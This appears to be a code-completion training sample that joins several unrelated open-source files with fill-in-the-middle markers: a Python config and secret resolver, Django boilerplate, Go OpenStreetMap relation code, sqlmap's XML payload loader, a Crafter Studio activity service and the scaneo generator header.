self._child_proxy = child_proxy
def get(self):
return json.loads(self._child_proxy.get())
class Base64DecodeFilter(Proxy):
def __init__(self, child_proxy):
self._child_proxy = child_proxy
def get(self):
return base64.b64decode(self._child_proxy.get())
class ElementFilter(Proxy):
def __init__(self, key, child_proxy):
try:
self._key = int(key)
except ValueError:
self._key = key
self._child_proxy = child_proxy
def get(self):
return self._child_proxy.get()[self._key]
class Resolver:
def __init__(self):
self._cache = {}
self._bucket_client = None
self._param_client = None
self._secret_client = None
def _get_or_create_cached_value(self, key, getter, ttl=None):
# happy path
try:
expiry, value = self._cache[key]
except KeyError:
pass
else:
if expiry is None or time.time() < expiry:
logger.debug("Key %s from cache", key)
return value
logger.debug("Cache for key %s has expired", key)
# get value
value = getter()
if ttl:
expiry = time.time() + ttl
else:
expiry = None
self._cache[key] = (expiry, value)
logger.debug("Set cache for key %s", key)
return value
def get_file_content(self, filepath):
cache_key = ("FILE", filepath)
def getter():
with open(filepath, "r") as f:
return f.read()
return self._get_or_create_cached_value(cache_key, getter)
def get_secret_value(self, name):
cache_key = ("SECRET", name)
if not self._secret_client:
self._secret_client = get_secret_client()
def getter():
return self._secret_client.get(name)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
def get_bucket_file(self, key):
cache_key = ("BUCKET_FILE", key)
if not self._bucket_client:
self._bucket_client = get_bucket_client()
def getter():
return self._bucket_client.download_to_tmpfile(key)
return self._get_or_create_cached_value(cache_key, getter)
def get_parameter_value(self, key):
cache_key = ("PARAM", key)
if not self._param_client:
self._param_client = get_param_client()
def getter():
return self._param_client.get(key)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
class BaseConfig:
PROXY_VAR_RE = re.compile(
r"^\{\{\s*"
r"(?P<type>bucket_file|env|file|param|secret)\:(?P<key>[^\}\|]+)"
r"(?P<filters>(\s*\|\s*(jsondecode|base64decode|element:[a-zA-Z_\-/0-9]+))*)"
r"\s*\}\}$"
)
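# Matches placeholders such as "{{ env:ZENTRAL_API_SECRET }}" or "{{ secret:db | jsondecode | element:password }}" (names here are illustrative).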
custom_classes = {}
def __init__(self, path=None, resolver=None):
self._path = path or ()
if not resolver:
resolver = Resolver()
self._resolver = resolver
def _make_proxy(self, key, match):
proxy_type = match.group("type")
key = match.group("key").strip()
if proxy_type == "env":
proxy = EnvProxy(key)
else:
proxy = ResolverMethodProxy(self._resolver, proxy_type, key)
filters = [f for f in [rf.strip() for rf in match.group("filters").split("|")] if f]
for filter_name in filters:
if filter_name == "jsondecode":
proxy = JSONDecodeFilter(proxy)
elif filter_name == "base64decode":
proxy = Base64DecodeFilter(proxy)
elif filter_name.startswith("element:"):
key = filter_name.split(":", 1)[-1]
proxy = ElementFilter(key, proxy)
else:
raise ValueError("Unknown filter %s", filter_name)
return proxy
def _from_python(self, key, value):
new_path = self._path + (key,)
if isinstance(value, dict):
value = self.custom_classes.get(new_path, ConfigDict)(value, new_path)
elif isinstance(value, list):
value = self.custom_classes.get(new_path, ConfigList)(value, new_path)
elif isinstance(value, str):
match = self.PROXY_VAR_RE.match(value)
if match:
value = self._make_proxy(key, match)
return value
def _to_python(self, value):
if isinstance(value, Proxy):
return value.get()
else:
return value
def __len__(self):
return len(self._collection)
def __delitem__(self, key):
del self._collection[key]
def __setitem__(self, key, value):
self._collection[key] = self._from_python(key, value)
def pop(self, key, default=None):
value = self._collection.pop(key, default)
if isinstance(value, Proxy):
value = value.get()
return value
class ConfigList(BaseConfig):
def __init__(self, config_l, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = []
for key, value in enumerate(config_l):
self._collection.append(self._from_python(str(key), value))
def __getitem__(self, key):
value = self._collection[key]
if isinstance(key, slice):
slice_repr = ":".join(str("" if i is None else i) for i in (key.start, key.stop, key.step))
logger.debug("Get /%s[%s] config key", "/".join(self._path), slice_repr)
return [self._to_python(item) for item in value]
else:
logger.debug("Get /%s[%s] config key", "/".join(self._path), key)
return self._to_python(value)
def __iter__(self):
for element in self._collection:
yield self._to_python(element)
def serialize(self):
s = []
for v in self:
if isinstance(v, BaseConfig):
v = v.serialize()
s.append(v)
return s
class ConfigDict(BaseConfig):
def __init__(self, config_d, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = {}
for key, value in config_d.items():
self._collection[key] = self._from_python(key, value)
def __getitem__(self, key):
logger.debug("Get /%s config key", "/".join(self._path + (key,)))
value = self._collection[key]
return self._to_python(value)
def get(self, key, default=None):
try:
value = self[key]
except KeyError:
value = self._to_python(default)
return value
def __iter__(self):
yield from self._collection
def keys(self):
return self._collection.keys()
def values(self):
for value in self._collection.values():
yield self._to_python(value)
def items(self):
for key, value in self._collection.items():
yield key, self._to_python(value)
def clear(self):
return self._collection.clear()
def setdefault(self, key, default=None):
return self._collection.setdefault(key, self._from_python(key, default))
def pop(self, key, default=None):
value = self._collection.pop(key, default)
return self._to_python(value)
def popitem(self):
key, value = self._collection.popitem()
return key, self._to_python(value)
def copy(self):
return ConfigDict(self._collection.copy(), path=self._path, resolver=self._resolver)
def update(self, *args, **kwargs):
chain = []
for arg in args:
if isinstance(arg, dict):
iterator = arg.items()
else:
iterator = arg
chain = itertools.chain(chain, iterator)
if kwargs:
chain = itertools.chain(chain, kwargs.items())
for key, value in chain:
self._collection[key] = self._from_python(key, value)
def serialize(self):
s = {}
for k, v in self.items():
if isinstance(v, BaseConfig):<|fim▁hole|><|fim▁end|>
|
v = v.serialize()
s[k] = v
return s
|
<|file_name|>manage.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "RandomPasswordGenerator.settings")
try:
from django.core.management import execute_from_command_line
<|fim▁hole|> # The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)<|fim▁end|>
|
except ImportError:
|
<|file_name|>relation.go<|end_file_name|><|fim▁begin|>package relation
import (
// "fmt"
"github.com/vetinari/osm/bbox"
"github.com/vetinari/osm/item"
"github.com/vetinari/osm/node"
"github.com/vetinari/osm/tags"
"github.com/vetinari/osm/user"
"github.com/vetinari/osm/way"
"time"
)
func (self *Relation) Type() item.ItemType { return item.TypeRelation }
func (self *Relation) Id() int64 { return self.Id_ }
func (self *Relation) Members() []*Member { return self.Members_ }
func (self *Relation) User() *user.User { return self.User_ }
func (self *Relation) Tags() *tags.Tags { return self.Tags_ }
func (self *Relation) Timestamp() time.Time { return self.Timestamp_ }
func (self *Relation) Version() int64 { return self.Version_ }
func (self *Relation) Changeset() int64 { return self.Changeset_ }
func (self *Relation) Visible() bool { return self.Visible_ }
var newRelationNum int64 = 0
func newRelationId() int64 {
newRelationNum -= 1
return newRelationNum
}
type Member struct {
Type_ item.ItemType
Role string
Ref item.Item
Id_ int64
}
type Relation struct {
Id_ int64
Members_ []*Member
User_ *user.User
Tags_ *tags.Tags
Timestamp_ time.Time
Version_ int64
Changeset_ int64
Visible_ bool
modified bool
deleted bool
}
type RelationList []*Relation
func NewRelation(m *Member) *Relation {
return &Relation{
Members_: []*Member{m},
Id_: newRelationId(),
Tags_: tags.New(),
Timestamp_: time.Now(),
Version_: 0,
Changeset_: 0,
Visible_: true,
User_: &user.User{Id: 0, Name: ""},
modified: true,
deleted: false,
}
}
func (m *Member) Type() item.ItemType {
return m.Type_
}
func (m *Member) Id() int64 {
return m.Id_
}
func NewMember(role string, i item.Item) *Member {
switch i.Type() {
case item.TypeNode:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*node.Node).Id()}
case item.TypeWay:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*way.Way).Id()}
case item.TypeRelation:
return &Member{Type_: i.Type(), Role: role, Ref: i, Id_: i.(*Relation).Id()}
default:
panic("invalid member type")
}
}
func (r *Relation) GetMembers() []*Member {
return r.Members_
}
func (r *Relation) AddMember(i item.Item, role string) {
r.Members_ = append(r.Members_, NewMember(role, i))
}<|fim▁hole|>func (r *Relation) GetNodes() []*node.Node {
var n []*node.Node
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *node.Node:
n = append(n, (m.Ref).(*node.Node))
case *way.Way:
n = append(n, (m.Ref).(*way.Way).GetNodes()...)
case *Relation:
n = append(n, (m.Ref).(*Relation).GetNodes()...)
}
}
return n
}
func (r *Relation) GetWays() []*way.Way {
var w []*way.Way
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *way.Way:
w = append(w, (m.Ref).(*way.Way))
case *Relation:
w = append(w, (m.Ref).(*Relation).GetWays()...)
default:
continue
}
}
return w
}
func (r *Relation) BoundingBox() (*bbox.BBox, error) {
return node.NodeList(r.GetNodes()).BoundingBox()
}
// Recursively collects all members of type "way"
func (r *Relation) WayMembers() []*Member {
var wm []*Member
for _, m := range r.GetMembers() {
switch (m.Ref).(type) {
case *way.Way:
wm = append(wm, m)
case *Relation:
wm = append(wm, (m.Ref).(*Relation).WayMembers()...)
default:
continue
}
}
return wm
}
func (r *Relation) IsMultipolygon() bool {
if r.Tags_ == nil {
return false
}
t := map[string]string(*r.Tags_)
return t["type"] == "multipolygon"
}
func (r *Relation) IsAreaRelation() bool {
if r.Tags_ == nil {
return false
}
switch r.Tags_.Get("type") {
case "multipolygon", "boundary":
return true
default:
return false
}
}
// If a way in the r.WayMembers() output is connected to the next one in
// the list (and they must have the same role) they're joined, otherwise
// a new way is started.
//
// For area relations like "type=multipolygon" or "type=boundary" you can
// check if the member ways build a closed ring (or multiple rings) by
// running Cosed() for each way returned by this func.
func (r *Relation) WayMembersAsWays() ([]*way.Way, error) {
var ways []*way.Way
var err error
all := r.WayMembers()
if len(all) == 0 {
return way.EmptyWays(), nil
}
if len(all) == 1 {
// in doubt we get an empty list back
n, err := way.New(all[0].Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
return []*way.Way{n}, nil
}
cur, all := all[0], all[1:]
// prev := cur
role := cur.Role
cur_w, err := way.New(cur.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
for _, wr := range all {
if wr.Role != role {
ways = append(ways, cur_w)
cur_w, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
role = wr.Role
// prev = wr
continue
}
conn := cur_w.Connected(wr.Ref.(*way.Way))
// fmt.Printf("Connected: #%d - #%d => %s\n", prev.Ref.(*way.Way).Id(), wr.Ref.(*way.Way).Id(), conn)
var conn_way *way.Way
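// Reorient one or both ways so that cur_w ends where conn_way begins before joining them.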
switch conn {
case way.NotConnected:
ways = append(ways, cur_w)
cur_w, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
role = wr.Role
// prev = wr
continue
case way.ConnectedNormal:
conn_way = wr.Ref.(*way.Way)
case way.ConnectedReversed1st:
cur_w.Reverse()
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
case way.ConnectedReversed2nd:
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
conn_way.Reverse()
case way.ConnectedReversedBoth:
cur_w.Reverse()
conn_way, err = way.New(wr.Ref.(*way.Way).Nodes())
if err != nil {
return way.EmptyWays(), err
}
conn_way.Reverse()
}
_ = cur_w.Join(conn_way) // we already checked they're connected
// prev = wr
}
return append(ways, cur_w), nil
}
// vim: ts=4 sw=4 noexpandtab nolist syn=go<|fim▁end|>
| |
<|file_name|>0005_auto_20150412_1806.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
<|fim▁hole|>class Migration(migrations.Migration):
dependencies = [
('hhlregistrations', '0004_auto_20150411_1935'),
]
operations = [
migrations.AddField(
model_name='event',
name='payment_due',
field=models.DateTimeField(null=True, blank=True),
),
migrations.AddField(
model_name='event',
name='require_registration',
field=models.BooleanField(default=False),
),
]<|fim▁end|>
| |
<|file_name|>payloads.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
from xml.etree import ElementTree as et
from lib.core.data import conf
from lib.core.data import logger
from lib.core.data import paths
from lib.core.datatype import AttribDict
from lib.core.exception import SqlmapInstallationException
def cleanupVals(text, tag):
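# Values of <clause> and <where> tags are comma-separated lists; other tags hold scalar values.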
if tag in ("clause", "where"):
text = text.split(',')
if isinstance(text, basestring):
text = int(text) if text.isdigit() else str(text)
elif isinstance(text, list):
count = 0
for _ in text:
text[count] = int(_) if _.isdigit() else str(_)
count += 1
if len(text) == 1 and tag not in ("clause", "where"):
text = text[0]
return text
def parseXmlNode(node):
for element in node.getiterator('boundary'):
boundary = AttribDict()
<|fim▁hole|> if child.text:
values = cleanupVals(child.text, child.tag)
boundary[child.tag] = values
else:
boundary[child.tag] = None
conf.boundaries.append(boundary)
for element in node.getiterator('test'):
test = AttribDict()
for child in element.getchildren():
if child.text and child.text.strip():
values = cleanupVals(child.text, child.tag)
test[child.tag] = values
else:
if len(child.getchildren()) == 0:
test[child.tag] = None
continue
else:
test[child.tag] = AttribDict()
for gchild in child.getchildren():
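# A repeated grandchild tag is folded into a [previous, current] pair; a third occurrence nests again.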
if gchild.tag in test[child.tag]:
prevtext = test[child.tag][gchild.tag]
test[child.tag][gchild.tag] = [prevtext, gchild.text]
else:
test[child.tag][gchild.tag] = gchild.text
conf.tests.append(test)
def loadBoundaries():
try:
doc = et.parse(paths.BOUNDARIES_XML)
except Exception, ex:
errMsg = "something seems to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
def loadPayloads():
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
payloadFiles.sort()
for payloadFile in payloadFiles:
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
#logger.debug("Parsing payloads from file '%s'" % payloadFile)
try:
doc = et.parse(payloadFilePath)
except Exception, ex:
errMsg = "something seems to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)<|fim▁end|>
|
for child in element.getchildren():
|
<|file_name|>ActivityServiceImpl.java<|end_file_name|><|fim▁begin|>/*
* Crafter Studio Web-content authoring solution
* Copyright (C) 2007-2016 Crafter Software Corporation.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.craftercms.studio.impl.v1.service.activity;
import java.time.ZoneOffset;
import java.time.ZonedDateTime;
import java.util.*;
import net.sf.json.JSONObject;
import org.apache.commons.collections.CollectionUtils;
import org.apache.commons.lang3.StringUtils;
import org.craftercms.commons.validation.annotations.param.ValidateIntegerParam;
import org.craftercms.commons.validation.annotations.param.ValidateParams;
import org.craftercms.commons.validation.annotations.param.ValidateSecurePathParam;
import org.craftercms.commons.validation.annotations.param.ValidateStringParam;
import org.craftercms.studio.api.v1.constant.StudioConstants;
import org.craftercms.studio.api.v1.constant.DmConstants;
import org.craftercms.studio.api.v1.dal.AuditFeed;
import org.craftercms.studio.api.v1.dal.AuditFeedMapper;
import org.craftercms.studio.api.v1.exception.ServiceException;
import org.craftercms.studio.api.v1.exception.SiteNotFoundException;
import org.craftercms.studio.api.v1.log.Logger;
import org.craftercms.studio.api.v1.log.LoggerFactory;
import org.craftercms.studio.api.v1.service.AbstractRegistrableService;
import org.craftercms.studio.api.v1.service.activity.ActivityService;
import org.craftercms.studio.api.v1.service.content.ContentService;
import org.craftercms.studio.api.v1.service.deployment.DeploymentService;
import org.craftercms.studio.api.v1.service.objectstate.State;
import org.craftercms.studio.api.v1.service.site.SiteService;
import org.craftercms.studio.api.v1.to.ContentItemTO;
import org.craftercms.studio.api.v1.util.DebugUtils;
import org.craftercms.studio.api.v1.util.StudioConfiguration;
import org.springframework.beans.factory.annotation.Autowired;
import org.craftercms.studio.api.v1.service.security.SecurityService;
import static org.craftercms.studio.api.v1.constant.StudioConstants.CONTENT_TYPE_PAGE;
import static org.craftercms.studio.api.v1.util.StudioConfiguration.ACTIVITY_USERNAME_CASE_SENSITIVE;
public class ActivityServiceImpl extends AbstractRegistrableService implements ActivityService {
private static final Logger logger = LoggerFactory.getLogger(ActivityServiceImpl.class);
protected static final int MAX_LEN_USER_ID = 255; // needs to match schema:
// feed_user_id,
// post_user_id
protected static final int MAX_LEN_SITE_ID = 255; // needs to match schema:
// site_network
protected static final int MAX_LEN_ACTIVITY_TYPE = 255; // needs to match
// schema:
// activity_type
protected static final int MAX_LEN_ACTIVITY_DATA = 4000; // needs to match
// schema:
// activity_data
protected static final int MAX_LEN_APP_TOOL_ID = 36; // needs to match
// schema: app_tool
/** activity post properties **/
protected static final String ACTIVITY_PROP_ACTIVITY_SUMMARY = "activitySummary";
protected static final String ACTIVITY_PROP_ID = "id";
protected static final String ACTIVITY_PROP_POST_DATE = "postDate";
protected static final String ACTIVITY_PROP_USER = "user";
protected static final String ACTIVITY_PROP_FEEDUSER = "feedUserId";
protected static final String ACTIVITY_PROP_CONTENTID = "contentId";
/** activity feed format **/
protected static final String ACTIVITY_FEED_FORMAT = "json";
@Autowired
protected AuditFeedMapper auditFeedMapper;
protected SiteService siteService;
protected ContentService contentService;
protected SecurityService securityService;
protected StudioConfiguration studioConfiguration;
protected DeploymentService deploymentService;
@Override
public void register() {
getServicesManager().registerService(ActivityService.class, this);
}
@Override
@ValidateParams
public void postActivity(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, @ValidateSecurePathParam(name = "contentId") String contentId, ActivityType activity, ActivitySource source, Map<String,String> extraInfo) {
JSONObject activityPost = new JSONObject();
activityPost.put(ACTIVITY_PROP_USER, user);
activityPost.put(ACTIVITY_PROP_ID, contentId);
if (extraInfo != null) {
activityPost.putAll(extraInfo);
}
String contentType = null;
if (extraInfo != null) {
contentType = extraInfo.get(DmConstants.KEY_CONTENT_TYPE);
}
postActivity(activity.toString(), source.toString(), site, null, activityPost.toString(),contentId,contentType, user);
}
private void postActivity(String activityType, String activitySource, String siteNetwork, String appTool, String activityData,
String contentId, String contentType, String approver) {
String currentUser = (StringUtils.isEmpty(approver)) ? securityService.getCurrentUser() : approver;
try {
// optional - default to empty string
if (siteNetwork == null) {
siteNetwork = "";
} else if (siteNetwork.length() > MAX_LEN_SITE_ID) {
throw new ServiceException("Invalid site network - exceeds " + MAX_LEN_SITE_ID + " chars: "
+ siteNetwork);
}
// optional - default to empty string
if (appTool == null) {
appTool = "";
} else if (appTool.length() > MAX_LEN_APP_TOOL_ID) {
throw new ServiceException("Invalid app tool - exceeds " + MAX_LEN_APP_TOOL_ID + " chars: " + appTool);
}
// required
if (StringUtils.isEmpty(activityType)) {
throw new ServiceException("Invalid activity type - activity type is empty");
} else if (activityType.length() > MAX_LEN_ACTIVITY_TYPE) {
throw new ServiceException("Invalid activity type - exceeds " + MAX_LEN_ACTIVITY_TYPE + " chars: "
+ activityType);
}
// optional - default to empty string
if (activityData == null) {
activityData = "";
} else if (activityData.length() > MAX_LEN_ACTIVITY_DATA) {
throw new ServiceException("Invalid activity data - exceeds " + MAX_LEN_ACTIVITY_DATA + " chars: "
+ activityData);
}
// required
if (StringUtils.isEmpty(currentUser)) {
throw new ServiceException("Invalid user - user is empty");
} else if (currentUser.length() > MAX_LEN_USER_ID) {
throw new ServiceException("Invalid user - exceeds " + MAX_LEN_USER_ID + " chars: " + currentUser);
} else {
// user names are not case-sensitive
currentUser = currentUser.toLowerCase();
}
if (contentType == null) {
contentType = CONTENT_TYPE_PAGE;
}
} catch (ServiceException e) {
// log validation error and continue; the activity is still posted below
logger.error("Error validating activity post parameters", e);
}
try {
ZonedDateTime postDate = ZonedDateTime.now(ZoneOffset.UTC);
AuditFeed activityPost = new AuditFeed();
activityPost.setUserId(currentUser);
activityPost.setSiteNetwork(siteNetwork);
activityPost.setSummary(activityData);
activityPost.setType(activityType);
activityPost.setCreationDate(postDate);
activityPost.setModifiedDate(postDate);
activityPost.setSummaryFormat("json");
activityPost.setContentId(contentId);
activityPost.setContentType(contentType);
activityPost.setSource(activitySource);
try {
activityPost.setCreationDate(ZonedDateTime.now(ZoneOffset.UTC));
long postId = insertFeedEntry(activityPost);
activityPost.setId(postId);
logger.debug("Posted: " + activityPost);
} catch (Exception e) {
throw new ServiceException("Failed to post activity: " + e, e);
}
}
catch (ServiceException e) {
// log error, subsume exception (for post activity)
logger.error("Error in posting feed", e);
}
}
private long insertFeedEntry(AuditFeed activityFeed) {
DebugUtils.addDebugStack(logger);
logger.debug("Insert activity " + activityFeed.getContentId());
Long id = auditFeedMapper.insertActivityFeed(activityFeed);
return (id != null ? id : -1);
}
@Override
@ValidateParams
public void renameContentId(@ValidateStringParam(name = "site") String site, @ValidateSecurePathParam(name = "oldUrl") String oldUrl, @ValidateSecurePathParam(name = "newUrl") String newUrl) {
DebugUtils.addDebugStack(logger);
logger.debug("Rename " + oldUrl + " to " + newUrl);
Map<String, String> params = new HashMap<String, String>();
params.put("newPath", newUrl);
params.put("site", site);
params.put("oldPath", oldUrl);
auditFeedMapper.renameContent(params);
}
@Override
@ValidateParams
public List<ContentItemTO> getActivities(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, @ValidateIntegerParam(name = "num") int num, @ValidateStringParam(name = "sort") String sort, boolean ascending, boolean excludeLive, @ValidateStringParam(name = "filterType") String filterType) throws ServiceException {
int startPos = 0;
List<ContentItemTO> contentItems = new ArrayList<ContentItemTO>();
boolean hasMoreItems = true;
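// Page through the audit feed until 'num' items survive filtering or the table is exhausted.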
while(contentItems.size() < num && hasMoreItems){
int remainingItems = num - contentItems.size();
hasMoreItems = getActivityFeeds(user, site, startPos, num, filterType, excludeLive, contentItems, remainingItems);
startPos = startPos+num;
}
if(contentItems.size() > num){
return contentItems.subList(0, num);
}
return contentItems;
}
/**
*
* Returns all non-live items when hideLiveItems is true; otherwise returns all feed entries.
*
*/
protected boolean getActivityFeeds(String user, String site,int startPos, int size, String filterType,boolean hideLiveItems,List<ContentItemTO> contentItems,int remainingItem){
List<String> activityFeedEntries = new ArrayList<String>();
if (!getUserNamesAreCaseSensitive()) {
user = user.toLowerCase();
}
List<AuditFeed> activityFeeds = null;
activityFeeds = selectUserFeedEntries(user, ACTIVITY_FEED_FORMAT, site, startPos, size,
filterType, hideLiveItems);
for (AuditFeed activityFeed : activityFeeds) {
activityFeedEntries.add(activityFeed.getJSONString());
}
boolean hasMoreItems=true;
//if number of items returned is less than size it means that table has no more records
if(activityFeedEntries.size()<size){
hasMoreItems=false;
}
if (activityFeedEntries != null && activityFeedEntries.size() > 0) {
for (int index = 0; index < activityFeedEntries.size() && remainingItem!=0; index++) {
JSONObject feedObject = JSONObject.fromObject(activityFeedEntries.get(index));
String id = (feedObject.containsKey(ACTIVITY_PROP_CONTENTID)) ? feedObject.getString(ACTIVITY_PROP_CONTENTID) : "";
ContentItemTO item = createActivityItem(site, feedObject, id);
item.published = true;
item.setPublished(true);
ZonedDateTime pubDate = deploymentService.getLastDeploymentDate(site, id);
item.publishedDate = pubDate;
item.setPublishedDate(pubDate);
contentItems.add(item);
remainingItem--;
}
}
logger.debug("Total Item post live filter : " + contentItems.size() + " hasMoreItems : "+hasMoreItems);
return hasMoreItems;
}
/**
* create an activity from the given feed
*
* @param site
* @param feedObject
* @return activity
*/
protected ContentItemTO createActivityItem(String site, JSONObject feedObject, String id) {
try {
ContentItemTO item = contentService.getContentItem(site, id, 0);
if(item == null || item.isDeleted()) {
item = contentService.createDummyDmContentItemForDeletedNode(site, id);
String modifier = (feedObject.containsKey(ACTIVITY_PROP_FEEDUSER)) ? feedObject.getString(ACTIVITY_PROP_FEEDUSER) : "";
if(modifier != null && !modifier.isEmpty()) {
item.user = modifier;
}
String activitySummary = (feedObject.containsKey(ACTIVITY_PROP_ACTIVITY_SUMMARY)) ? feedObject.getString(ACTIVITY_PROP_ACTIVITY_SUMMARY) : "";
JSONObject summaryObject = JSONObject.fromObject(activitySummary);
if (summaryObject.containsKey(DmConstants.KEY_CONTENT_TYPE)) {
String contentType = (String)summaryObject.get(DmConstants.KEY_CONTENT_TYPE);
item.contentType = contentType;
}
if(summaryObject.containsKey(StudioConstants.INTERNAL_NAME)) {
String internalName = (String)summaryObject.get(StudioConstants.INTERNAL_NAME);
item.internalName = internalName;
}
if(summaryObject.containsKey(StudioConstants.BROWSER_URI)) {
String browserUri = (String)summaryObject.get(StudioConstants.BROWSER_URI);
item.browserUri = browserUri;
}
item.setLockOwner("");
}
String postDate = (feedObject.containsKey(ACTIVITY_PROP_POST_DATE)) ? feedObject.getString(ACTIVITY_PROP_POST_DATE) : "";
// ZonedDateTime.parse never returns null (it throws on invalid input, which the
// catch block below handles), so the event date can be normalized to UTC unconditionally.
ZonedDateTime editedDate = ZonedDateTime.parse(postDate);
item.eventDate = editedDate.withZoneSameInstant(ZoneOffset.UTC);
return item;
} catch (Exception e) {
logger.error("Error fetching content item for [" + id + "]", e.getMessage());
return null;
}
}
private List<AuditFeed> selectUserFeedEntries(String feedUserId, String format, String siteId, int startPos, int feedSize, String contentType, boolean hideLiveItems) {<|fim▁hole|> params.put("userId",feedUserId);
params.put("summaryFormat",format);
params.put("siteNetwork",siteId);
params.put("startPos", startPos);
params.put("feedSize", feedSize);
params.put("activities", Arrays.asList(ActivityType.CREATED, ActivityType.DELETED, ActivityType.UPDATED, ActivityType.MOVED));
if(StringUtils.isNotEmpty(contentType) && !contentType.toLowerCase().equals("all")){
params.put("contentType",contentType.toLowerCase());
}
if (hideLiveItems) {
List<String> statesValues = new ArrayList<String>();
for (State state : State.LIVE_STATES) {
statesValues.add(state.name());
}
params.put("states", statesValues);
return auditFeedMapper.selectUserFeedEntriesHideLive(params);
} else {
return auditFeedMapper.selectUserFeedEntries(params);
}
}
@Override
@ValidateParams
public AuditFeed getDeletedActivity(@ValidateStringParam(name = "site") String site, @ValidateSecurePathParam(name = "path") String path) {
HashMap<String,String> params = new HashMap<String,String>();
params.put("contentId", path);
params.put("siteNetwork", site);
String activityType = ActivityType.DELETED.toString();
params.put("activityType", activityType);
return auditFeedMapper.getDeletedActivity(params);
}
@Override
@ValidateParams
public void deleteActivitiesForSite(@ValidateStringParam(name = "site") String site) {
Map<String, String> params = new HashMap<String, String>();
params.put("site", site);
auditFeedMapper.deleteActivitiesForSite(params);
}
@Override
@ValidateParams
public List<AuditFeed> getAuditLogForSite(@ValidateStringParam(name = "site") String site, @ValidateIntegerParam(name = "start") int start, @ValidateIntegerParam(name = "number") int number, @ValidateStringParam(name = "user") String user, List<String> actions)
throws SiteNotFoundException {
if (!siteService.exists(site)) {
throw new SiteNotFoundException();
} else {
Map<String, Object> params = new HashMap<String, Object>();
params.put("site", site);
params.put("start", start);
params.put("number", number);
if (StringUtils.isNotEmpty(user)) {
params.put("user", user);
}
if (CollectionUtils.isNotEmpty(actions)) {
params.put("actions", actions);
}
return auditFeedMapper.getAuditLogForSite(params);
}
}
@Override
@ValidateParams
public long getAuditLogForSiteTotal(@ValidateStringParam(name = "site") String site, @ValidateStringParam(name = "user") String user, List<String> actions)
throws SiteNotFoundException {
if (!siteService.exists(site)) {
throw new SiteNotFoundException();
} else {
Map<String, Object> params = new HashMap<String, Object>();
params.put("site", site);
if (StringUtils.isNotEmpty(user)) {
params.put("user", user);
}
if (CollectionUtils.isNotEmpty(actions)) {
params.put("actions", actions);
}
return auditFeedMapper.getAuditLogForSiteTotal(params);
}
}
public boolean getUserNamesAreCaseSensitive() {
return Boolean.parseBoolean(studioConfiguration.getProperty(ACTIVITY_USERNAME_CASE_SENSITIVE));
}
public SiteService getSiteService() {
return siteService;
}
public void setSiteService(final SiteService siteService) {
this.siteService = siteService;
}
public void setContentService(ContentService contentService) {
this.contentService = contentService;
}
public SecurityService getSecurityService() { return securityService; }
public void setSecurityService(SecurityService securityService) { this.securityService = securityService; }
public StudioConfiguration getStudioConfiguration() { return studioConfiguration; }
public void setStudioConfiguration(StudioConfiguration studioConfiguration) { this.studioConfiguration = studioConfiguration; }
public DeploymentService getDeploymentService() { return deploymentService; }
public void setDeploymentService(DeploymentService deploymentService) { this.deploymentService = deploymentService; }
}<|fim▁end|>
|
HashMap<String,Object> params = new HashMap<String,Object>();
|
<|file_name|>scaneo.go<|end_file_name|><|fim▁begin|>package main
import (
"errors"
"flag"
"fmt"
"go/ast"
"go/parser"
"go/token"
"log"
"os"
"path/filepath"
"strings"
"text/template"
)
const (
usageText = `SCANEO
Generate Go code to convert database rows into arbitrary structs.
USAGE
scaneo [options] paths...
OPTIONS
-o, -output
Set the name of the generated file. Default is scans.go.
-p, -package
Set the package name for the generated file. Default is current
directory name.
-u, -unexport
Generate unexported functions. Default is export all.
-w, -whitelist
Only include structs specified in case-sensitive, comma-delimited
string.
-v, -version
Print version and exit.
-h, -help
Print help and exit.
EXAMPLES
tables.go is a file that contains one or more struct declarations.
